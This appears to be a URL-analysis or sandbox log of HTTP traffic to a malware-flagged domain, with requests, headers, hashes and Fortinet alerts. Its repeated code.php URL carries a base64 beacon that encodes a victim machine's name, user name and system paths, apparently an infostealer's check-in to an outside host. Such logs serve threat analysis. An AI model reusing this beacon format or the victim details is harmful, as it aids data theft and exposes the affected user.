www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=TWFpbE91IEF0IFRoaXMgQ29tcHV0ZXIgTmFtZSA6IERFU0tUT1AtQjBUOTNENgoJCUxvY2FsIFRpbWUgOiAyMDIzLTA1LTA3XzE1OjAwOjAwCgkJT1MgOiBXaW5kb3dzX05UCgkJUFJPQ0VTU09SIElERU5USUZJRVIgOiBJbnRlbDY0IEZhbWlseSA2IE1vZGVsIDg1IFN0ZXBwaW5nIDcsIEdlbnVpbmVJbnRlbAoJCUxPR09OIFNFUlZFUiA6IFxcREVTS1RPUC1CMFQ5M0Q2CgkJSE9NRSBEUklWRSA6IEM6CgkJSE9NRSBQQVRIIDogXFVzZXJzXGdlb3JnZQoJCVVTRVIgRE9NQUlOIDogREVTS1RPUC1CMFQ5M0Q2CgkJVVNFUiBOQU1FIDogZ2VvcmdlCgkJVVNFUiBQUk9GSUxFIDogQzpcVXNlcnNcZ2VvcmdlCgkJQUxMIFVTRVJTIFBST0ZJTEUgOiBDOlxQcm9ncmFtRGF0YQoJCVdJTkRPV1MgRElSIDogQzpcV2luZG93cwoJCUNPTSBTUEVDIDogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlCgkJUEFUSCBFWFQgOiAuQ09NOy5FWEU7LkJBVDsuQ01EOy5WQlM7LlZCRTsuSlM7LkpTRTsuV1NGOy5XU0g7Lk1TQwoJCVBlYWNlIE9uIFlvdS4K
199.59.243.223 1.3 kB URL www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=TWFpbE91IEF0IFRoaXMgQ29tcHV0ZXIgTmFtZSA6IERFU0tUT1AtQjBUOTNENgoJCUxvY2FsIFRpbWUgOiAyMDIzLTA1LTA3XzE1OjAwOjAwCgkJT1MgOiBXaW5kb3dzX05UCgkJUFJPQ0VTU09SIElERU5USUZJRVIgOiBJbnRlbDY0IEZhbWlseSA2IE1vZGVsIDg1IFN0ZXBwaW5nIDcsIEdlbnVpbmVJbnRlbAoJCUxPR09OIFNFUlZFUiA6IFxcREVTS1RPUC1CMFQ5M0Q2CgkJSE9NRSBEUklWRSA6IEM6CgkJSE9NRSBQQVRIIDogXFVzZXJzXGdlb3JnZQoJCVVTRVIgRE9NQUlOIDogREVTS1RPUC1CMFQ5M0Q2CgkJVVNFUiBOQU1FIDogZ2VvcmdlCgkJVVNFUiBQUk9GSUxFIDogQzpcVXNlcnNcZ2VvcmdlCgkJQUxMIFVTRVJTIFBST0ZJTEUgOiBDOlxQcm9ncmFtRGF0YQoJCVdJTkRPV1MgRElSIDogQzpcV2luZG93cwoJCUNPTSBTUEVDIDogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlCgkJUEFUSCBFWFQgOiAuQ09NOy5FWEU7LkJBVDsuQ01EOy5WQlM7LlZCRTsuSlM7LkpTRTsuV1NGOy5XU0g7Lk1TQwoJCVBlYWNlIE9uIFlvdS4K
IP 199.59.243.223:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (1847), with no line terminators
Hash 7cda92dc12f1f9048b208c27ba9be017
94623fb82ac3057d4fa16f7790a8ae4908e9d1ec
074b991ae3cb0ef7cc347ac0bbfe4641c97b91455ace465712cc97bd9437b353
GET /code.php?mode=cb&usr=Z2Vvcmdl&cb=TWFpbE91IEF0IFRoaXMgQ29tcHV0ZXIgTmFtZSA6IERFU0tUT1AtQjBUOTNENgoJCUxvY2FsIFRpbWUgOiAyMDIzLTA1LTA3XzE1OjAwOjAwCgkJT1MgOiBXaW5kb3dzX05UCgkJUFJPQ0VTU09SIElERU5USUZJRVIgOiBJbnRlbDY0IEZhbWlseSA2IE1vZGVsIDg1IFN0ZXBwaW5nIDcsIEdlbnVpbmVJbnRlbAoJCUxPR09OIFNFUlZFUiA6IFxcREVTS1RPUC1CMFQ5M0Q2CgkJSE9NRSBEUklWRSA6IEM6CgkJSE9NRSBQQVRIIDogXFVzZXJzXGdlb3JnZQoJCVVTRVIgRE9NQUlOIDogREVTS1RPUC1CMFQ5M0Q2CgkJVVNFUiBOQU1FIDogZ2VvcmdlCgkJVVNFUiBQUk9GSUxFIDogQzpcVXNlcnNcZ2VvcmdlCgkJQUxMIFVTRVJTIFBST0ZJTEUgOiBDOlxQcm9ncmFtRGF0YQoJCVdJTkRPV1MgRElSIDogQzpcV2luZG93cwoJCUNPTSBTUEVDIDogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlCgkJUEFUSCBFWFQgOiAuQ09NOy5FWEU7LkJBVDsuQ01EOy5WQlM7LlZCRTsuSlM7LkpTRTsuV1NGOy5XU0g7Lk1TQwoJCVBlYWNlIE9uIFlvdS4K HTTP/1.1
Host: www.ibayme.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f; expires=Sun, 07-May-2023 15:27:07 GMT; Max-Age=900; path=/; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HkebLcw0LkCHh3Upa2QuBEzor07VonRJEMhnXWe4uvKZB08yCcDJomZYBfMYP2uaa8GkuKGiZiUWJr0AdjTuGg==
Accept-CH: sec-ch-prefers-color-scheme
Critical-CH: sec-ch-prefers-color-scheme
Vary: sec-ch-prefers-color-scheme
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
www.ibayme.eb2a.com/js/parking.2.104.9.js
199.59.243.223 22 kB URL www.ibayme.eb2a.com/js/parking.2.104.9.js
IP 199.59.243.223:0
File type HTML document, ASCII text, with very long lines (65536), with no line terminators
Hash 4373b6882998614499e168219b1e44ca
6591de3f6d18020cc8de3549f9a87115b44bea8b
e93edbb073fa2a6feedcdcec64b6d6b2f9e85b481f11ad8f5a66facac76cb101
Analyzer Verdict Alert fortinet Malware
GET /js/parking.2.104.9.js HTTP/1.1
Host: www.ibayme.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=TWFpbE91IEF0IFRoaXMgQ29tcHV0ZXIgTmFtZSA6IERFU0tUT1AtQjBUOTNENgoJCUxvY2FsIFRpbWUgOiAyMDIzLTA1LTA3XzE1OjAwOjAwCgkJT1MgOiBXaW5kb3dzX05UCgkJUFJPQ0VTU09SIElERU5USUZJRVIgOiBJbnRlbDY0IEZhbWlseSA2IE1vZGVsIDg1IFN0ZXBwaW5nIDcsIEdlbnVpbmVJbnRlbAoJCUxPR09OIFNFUlZFUiA6IFxcREVTS1RPUC1CMFQ5M0Q2CgkJSE9NRSBEUklWRSA6IEM6CgkJSE9NRSBQQVRIIDogXFVzZXJzXGdlb3JnZQoJCVVTRVIgRE9NQUlOIDogREVTS1RPUC1CMFQ5M0Q2CgkJVVNFUiBOQU1FIDogZ2VvcmdlCgkJVVNFUiBQUk9GSUxFIDogQzpcVXNlcnNcZ2VvcmdlCgkJQUxMIFVTRVJTIFBST0ZJTEUgOiBDOlxQcm9ncmFtRGF0YQoJCVdJTkRPV1MgRElSIDogQzpcV2luZG93cwoJCUNPTSBTUEVDIDogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlCgkJUEFUSCBFWFQgOiAuQ09NOy5FWEU7LkJBVDsuQ01EOy5WQlM7LlZCRTsuSlM7LkpTRTsuV1NGOy5XU0g7Lk1TQwoJCVBlYWNlIE9uIFlvdS4K
Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:07 GMT
Content-Type: application/javascript; charset=utf-8
Last-Modified: Wed, 03 May 2023 19:30:26 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
www.ibayme.eb2a.com/_fd?mode=cb&usr=Z2Vvcmdl&cb=TWFpbE91IEF0IFRoaXMgQ29tcHV0ZXIgTmFtZSA6IERFU0tUT1AtQjBUOTNENgoJCUxvY2FsIFRpbWUgOiAyMDIzLTA1LTA3XzE1OjAwOjAwCgkJT1MgOiBXaW5kb3dzX05UCgkJUFJPQ0VTU09SIElERU5USUZJRVIgOiBJbnRlbDY0IEZhbWlseSA2IE1vZGVsIDg1IFN0ZXBwaW5nIDcsIEdlbnVpbmVJbnRlbAoJCUxPR09OIFNFUlZFUiA6IFxcREVTS1RPUC1CMFQ5M0Q2CgkJSE9NRSBEUklWRSA6IEM6CgkJSE9NRSBQQVRIIDogXFVzZXJzXGdlb3JnZQoJCVVTRVIgRE9NQUlOIDogREVTS1RPUC1CMFQ5M0Q2CgkJVVNFUiBOQU1FIDogZ2VvcmdlCgkJVVNFUiBQUk9GSUxFIDogQzpcVXNlcnNcZ2VvcmdlCgkJQUxMIFVTRVJTIFBST0ZJTEUgOiBDOlxQcm9ncmFtRGF0YQoJCVdJTkRPV1MgRElSIDogQzpcV2luZG93cwoJCUNPTSBTUEVDIDogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlCgkJUEFUSCBFWFQgOiAuQ09NOy5FWEU7LkJBVDsuQ01EOy5WQlM7LlZCRTsuSlM7LkpTRTsuV1NGOy5XU0g7Lk1TQwoJCVBlYWNlIE9uIFlvdS4K
199.59.243.223 407 B URL www.ibayme.eb2a.com/_fd?mode=cb&usr=Z2Vvcmdl&cb=TWFpbE91IEF0IFRoaXMgQ29tcHV0ZXIgTmFtZSA6IERFU0tUT1AtQjBUOTNENgoJCUxvY2FsIFRpbWUgOiAyMDIzLTA1LTA3XzE1OjAwOjAwCgkJT1MgOiBXaW5kb3dzX05UCgkJUFJPQ0VTU09SIElERU5USUZJRVIgOiBJbnRlbDY0IEZhbWlseSA2IE1vZGVsIDg1IFN0ZXBwaW5nIDcsIEdlbnVpbmVJbnRlbAoJCUxPR09OIFNFUlZFUiA6IFxcREVTS1RPUC1CMFQ5M0Q2CgkJSE9NRSBEUklWRSA6IEM6CgkJSE9NRSBQQVRIIDogXFVzZXJzXGdlb3JnZQoJCVVTRVIgRE9NQUlOIDogREVTS1RPUC1CMFQ5M0Q2CgkJVVNFUiBOQU1FIDogZ2VvcmdlCgkJVVNFUiBQUk9GSUxFIDogQzpcVXNlcnNcZ2VvcmdlCgkJQUxMIFVTRVJTIFBST0ZJTEUgOiBDOlxQcm9ncmFtRGF0YQoJCVdJTkRPV1MgRElSIDogQzpcV2luZG93cwoJCUNPTSBTUEVDIDogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlCgkJUEFUSCBFWFQgOiAuQ09NOy5FWEU7LkJBVDsuQ01EOy5WQlM7LlZCRTsuSlM7LkpTRTsuV1NGOy5XU0g7Lk1TQwoJCVBlYWNlIE9uIFlvdS4K
IP 199.59.243.223:0
File type ASCII text, with very long lines (509), with no line terminators
Hash 9ed9d99cc6d401c54f3541f185648a28
f61a40425bef398fe5b0da6d10be8ec48f6c6cb0
f928af4b58d6763aab0558d8e5a5511be5926c66ece6fc8a4cb40e86aeb6682f
POST /_fd?mode=cb&usr=Z2Vvcmdl&cb=TWFpbE91IEF0IFRoaXMgQ29tcHV0ZXIgTmFtZSA6IERFU0tUT1AtQjBUOTNENgoJCUxvY2FsIFRpbWUgOiAyMDIzLTA1LTA3XzE1OjAwOjAwCgkJT1MgOiBXaW5kb3dzX05UCgkJUFJPQ0VTU09SIElERU5USUZJRVIgOiBJbnRlbDY0IEZhbWlseSA2IE1vZGVsIDg1IFN0ZXBwaW5nIDcsIEdlbnVpbmVJbnRlbAoJCUxPR09OIFNFUlZFUiA6IFxcREVTS1RPUC1CMFQ5M0Q2CgkJSE9NRSBEUklWRSA6IEM6CgkJSE9NRSBQQVRIIDogXFVzZXJzXGdlb3JnZQoJCVVTRVIgRE9NQUlOIDogREVTS1RPUC1CMFQ5M0Q2CgkJVVNFUiBOQU1FIDogZ2VvcmdlCgkJVVNFUiBQUk9GSUxFIDogQzpcVXNlcnNcZ2VvcmdlCgkJQUxMIFVTRVJTIFBST0ZJTEUgOiBDOlxQcm9ncmFtRGF0YQoJCVdJTkRPV1MgRElSIDogQzpcV2luZG93cwoJCUNPTSBTUEVDIDogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlCgkJUEFUSCBFWFQgOiAuQ09NOy5FWEU7LkJBVDsuQ01EOy5WQlM7LlZCRTsuSlM7LkpTRTsuV1NGOy5XU0g7Lk1TQwoJCVBlYWNlIE9uIFlvdS4K HTTP/1.1
Host: www.ibayme.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=TWFpbE91IEF0IFRoaXMgQ29tcHV0ZXIgTmFtZSA6IERFU0tUT1AtQjBUOTNENgoJCUxvY2FsIFRpbWUgOiAyMDIzLTA1LTA3XzE1OjAwOjAwCgkJT1MgOiBXaW5kb3dzX05UCgkJUFJPQ0VTU09SIElERU5USUZJRVIgOiBJbnRlbDY0IEZhbWlseSA2IE1vZGVsIDg1IFN0ZXBwaW5nIDcsIEdlbnVpbmVJbnRlbAoJCUxPR09OIFNFUlZFUiA6IFxcREVTS1RPUC1CMFQ5M0Q2CgkJSE9NRSBEUklWRSA6IEM6CgkJSE9NRSBQQVRIIDogXFVzZXJzXGdlb3JnZQoJCVVTRVIgRE9NQUlOIDogREVTS1RPUC1CMFQ5M0Q2CgkJVVNFUiBOQU1FIDogZ2VvcmdlCgkJVVNFUiBQUk9GSUxFIDogQzpcVXNlcnNcZ2VvcmdlCgkJQUxMIFVTRVJTIFBST0ZJTEUgOiBDOlxQcm9ncmFtRGF0YQoJCVdJTkRPV1MgRElSIDogQzpcV2luZG93cwoJCUNPTSBTUEVDIDogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlCgkJUEFUSCBFWFQgOiAuQ09NOy5FWEU7LkJBVDsuQ01EOy5WQlM7LlZCRTsuSlM7LkpTRTsuV1NGOy5XU0g7Lk1TQwoJCVBlYWNlIE9uIFlvdS4K
Content-Type: application/json
Origin: http://www.ibayme.eb2a.com
DNT: 1
Connection: keep-alive
Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
HTTP/1.1 200 OK
Server: openresty
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 07 May 2023 15:12:08 GMT
X-Version: 2.104.9
Set-Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f; expires=Sun, 07-May-2023 15:27:08 GMT; Max-Age=900; path=/; httponly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
www.ibayme.eb2a.com/px.gif?ch=2&rn=9.818423047680234
199.59.243.223 42 B URL www.ibayme.eb2a.com/px.gif?ch=2&rn=9.818423047680234
IP 199.59.243.223:0
File type GIF image data, version 89a, 1 x 1\012- data
Hash d89746888da2d9510b64a9f031eaecd5
d5fceb6532643d0d84ffe09c40c481ecdf59e15a
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
GET /px.gif?ch=2&rn=9.818423047680234 HTTP/1.1
Host: www.ibayme.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=TWFpbE91IEF0IFRoaXMgQ29tcHV0ZXIgTmFtZSA6IERFU0tUT1AtQjBUOTNENgoJCUxvY2FsIFRpbWUgOiAyMDIzLTA1LTA3XzE1OjAwOjAwCgkJT1MgOiBXaW5kb3dzX05UCgkJUFJPQ0VTU09SIElERU5USUZJRVIgOiBJbnRlbDY0IEZhbWlseSA2IE1vZGVsIDg1IFN0ZXBwaW5nIDcsIEdlbnVpbmVJbnRlbAoJCUxPR09OIFNFUlZFUiA6IFxcREVTS1RPUC1CMFQ5M0Q2CgkJSE9NRSBEUklWRSA6IEM6CgkJSE9NRSBQQVRIIDogXFVzZXJzXGdlb3JnZQoJCVVTRVIgRE9NQUlOIDogREVTS1RPUC1CMFQ5M0Q2CgkJVVNFUiBOQU1FIDogZ2VvcmdlCgkJVVNFUiBQUk9GSUxFIDogQzpcVXNlcnNcZ2VvcmdlCgkJQUxMIFVTRVJTIFBST0ZJTEUgOiBDOlxQcm9ncmFtRGF0YQoJCVdJTkRPV1MgRElSIDogQzpcV2luZG93cwoJCUNPTSBTUEVDIDogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlCgkJUEFUSCBFWFQgOiAuQ09NOy5FWEU7LkJBVDsuQ01EOy5WQlM7LlZCRTsuSlM7LkpTRTsuV1NGOy5XU0g7Lk1TQwoJCVBlYWNlIE9uIFlvdS4K
Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:08 GMT
Content-Type: image/gif
Content-Length: 42
Last-Modified: Wed, 15 Sep 2021 19:38:30 GMT
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Accept-Ranges: bytes
www.ibayme.eb2a.com/px.gif?ch=1&rn=9.818423047680234
199.59.243.223 42 B URL www.ibayme.eb2a.com/px.gif?ch=1&rn=9.818423047680234
IP 199.59.243.223:0
File type GIF image data, version 89a, 1 x 1\012- data
Hash d89746888da2d9510b64a9f031eaecd5
d5fceb6532643d0d84ffe09c40c481ecdf59e15a
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
GET /px.gif?ch=1&rn=9.818423047680234 HTTP/1.1
Host: www.ibayme.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=TWFpbE91IEF0IFRoaXMgQ29tcHV0ZXIgTmFtZSA6IERFU0tUT1AtQjBUOTNENgoJCUxvY2FsIFRpbWUgOiAyMDIzLTA1LTA3XzE1OjAwOjAwCgkJT1MgOiBXaW5kb3dzX05UCgkJUFJPQ0VTU09SIElERU5USUZJRVIgOiBJbnRlbDY0IEZhbWlseSA2IE1vZGVsIDg1IFN0ZXBwaW5nIDcsIEdlbnVpbmVJbnRlbAoJCUxPR09OIFNFUlZFUiA6IFxcREVTS1RPUC1CMFQ5M0Q2CgkJSE9NRSBEUklWRSA6IEM6CgkJSE9NRSBQQVRIIDogXFVzZXJzXGdlb3JnZQoJCVVTRVIgRE9NQUlOIDogREVTS1RPUC1CMFQ5M0Q2CgkJVVNFUiBOQU1FIDogZ2VvcmdlCgkJVVNFUiBQUk9GSUxFIDogQzpcVXNlcnNcZ2VvcmdlCgkJQUxMIFVTRVJTIFBST0ZJTEUgOiBDOlxQcm9ncmFtRGF0YQoJCVdJTkRPV1MgRElSIDogQzpcV2luZG93cwoJCUNPTSBTUEVDIDogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlCgkJUEFUSCBFWFQgOiAuQ09NOy5FWEU7LkJBVDsuQ01EOy5WQlM7LlZCRTsuSlM7LkpTRTsuV1NGOy5XU0g7Lk1TQwoJCVBlYWNlIE9uIFlvdS4K
Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:08 GMT
Content-Type: image/gif
Content-Length: 42
Last-Modified: Wed, 15 Sep 2021 19:38:30 GMT
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Accept-Ranges: bytes
ocsp.pki.goog/gts1c3
142.250.74.3 471 B IP 142.250.74.3:0
Hash 9e0048bfd4dbd888e603799c38403132
0d83fde57ec051b3268d6187be01605080ae9c8a
643718e3659186d0651b6e4bd3c0d138bdb786ab2b455724cb251cfa74d3c5f0
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sun, 07 May 2023 15:12:08 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.ibayme.eb2a.com/favicon.ico
199.59.243.223 0 B URL www.ibayme.eb2a.com/favicon.ico
IP 199.59.243.223:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /favicon.ico HTTP/1.1
Host: www.ibayme.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=TWFpbE91IEF0IFRoaXMgQ29tcHV0ZXIgTmFtZSA6IERFU0tUT1AtQjBUOTNENgoJCUxvY2FsIFRpbWUgOiAyMDIzLTA1LTA3XzE1OjAwOjAwCgkJT1MgOiBXaW5kb3dzX05UCgkJUFJPQ0VTU09SIElERU5USUZJRVIgOiBJbnRlbDY0IEZhbWlseSA2IE1vZGVsIDg1IFN0ZXBwaW5nIDcsIEdlbnVpbmVJbnRlbAoJCUxPR09OIFNFUlZFUiA6IFxcREVTS1RPUC1CMFQ5M0Q2CgkJSE9NRSBEUklWRSA6IEM6CgkJSE9NRSBQQVRIIDogXFVzZXJzXGdlb3JnZQoJCVVTRVIgRE9NQUlOIDogREVTS1RPUC1CMFQ5M0Q2CgkJVVNFUiBOQU1FIDogZ2VvcmdlCgkJVVNFUiBQUk9GSUxFIDogQzpcVXNlcnNcZ2VvcmdlCgkJQUxMIFVTRVJTIFBST0ZJTEUgOiBDOlxQcm9ncmFtRGF0YQoJCVdJTkRPV1MgRElSIDogQzpcV2luZG93cwoJCUNPTSBTUEVDIDogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlCgkJUEFUSCBFWFQgOiAuQ09NOy5FWEU7LkJBVDsuQ01EOy5WQlM7LlZCRTsuSlM7LkpTRTsuV1NGOy5XU0g7Lk1TQwoJCVBlYWNlIE9uIFlvdS4K
Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:08 GMT
Content-Type: image/x-icon
Content-Length: 0
Last-Modified: Wed, 15 Sep 2021 19:38:30 GMT
Connection: keep-alive
ETag: "61424bb6-0"
x-backend-server: ip-10-201-16-225.ec2.internal
Accept-Ranges: bytes
ocsp.pki.goog/gts1c3
142.250.74.3 472 B IP 142.250.74.3:0
Hash 0235c16024f816c08c15bcd38c1efccf
d7660b46f6a13426c9262608f0822f056e6e95b7
a7f70e8793c5537278b5258cc3de7f3ecb0c2b953ab626974f0a081720dae05d
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sun, 07 May 2023 15:12:08 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.ibayme.eb2a.com/_zc
199.59.243.223 168 B IP 199.59.243.223:0
File type ASCII text, with no line terminators
Hash 6a3c3958950137bc452ef214aebd4778
1444dd4b8f72c5b88de972919ed8553fa204cb25
fdc5b736561ac5aea5e570671b462fa81dd856bf89eb0c33f8daec21e055f298
Analyzer Verdict Alert fortinet Malware
POST /_zc HTTP/1.1
Host: www.ibayme.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.ibayme.eb2a.com/code.php?mode=cb&usr=Z2Vvcmdl&cb=TWFpbE91IEF0IFRoaXMgQ29tcHV0ZXIgTmFtZSA6IERFU0tUT1AtQjBUOTNENgoJCUxvY2FsIFRpbWUgOiAyMDIzLTA1LTA3XzE1OjAwOjAwCgkJT1MgOiBXaW5kb3dzX05UCgkJUFJPQ0VTU09SIElERU5USUZJRVIgOiBJbnRlbDY0IEZhbWlseSA2IE1vZGVsIDg1IFN0ZXBwaW5nIDcsIEdlbnVpbmVJbnRlbAoJCUxPR09OIFNFUlZFUiA6IFxcREVTS1RPUC1CMFQ5M0Q2CgkJSE9NRSBEUklWRSA6IEM6CgkJSE9NRSBQQVRIIDogXFVzZXJzXGdlb3JnZQoJCVVTRVIgRE9NQUlOIDogREVTS1RPUC1CMFQ5M0Q2CgkJVVNFUiBOQU1FIDogZ2VvcmdlCgkJVVNFUiBQUk9GSUxFIDogQzpcVXNlcnNcZ2VvcmdlCgkJQUxMIFVTRVJTIFBST0ZJTEUgOiBDOlxQcm9ncmFtRGF0YQoJCVdJTkRPV1MgRElSIDogQzpcV2luZG93cwoJCUNPTSBTUEVDIDogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlCgkJUEFUSCBFWFQgOiAuQ09NOy5FWEU7LkJBVDsuQ01EOy5WQlM7LlZCRTsuSlM7LkpTRTsuV1NGOy5XU0g7Lk1TQwoJCVBlYWNlIE9uIFlvdS4K
Content-Type: application/json
Content-Length: 2469
Origin: http://www.ibayme.eb2a.com
DNT: 1
Connection: keep-alive
Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 07 May 2023 15:12:08 GMT
X-Version: 2.104.9
Set-Cookie: parking_session=1582a58e-2cfa-ec8f-97c8-1df1b55c945f; expires=Sun, 07-May-2023 15:27:08 GMT; Max-Age=900; path=/; httponly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
199.59.243.223 865 B URL User Request GET ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
IP 199.59.243.223:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (1211), with no line terminators
Hash 992d992be297dc04da3fb0ab82ae3b36
f0875d8018cf779205b28f1fb1d786f7fe117e9c
6f26f1727e957a4147eafca30f5ca2747ede8aaf8dab26221a89363be6d28edb
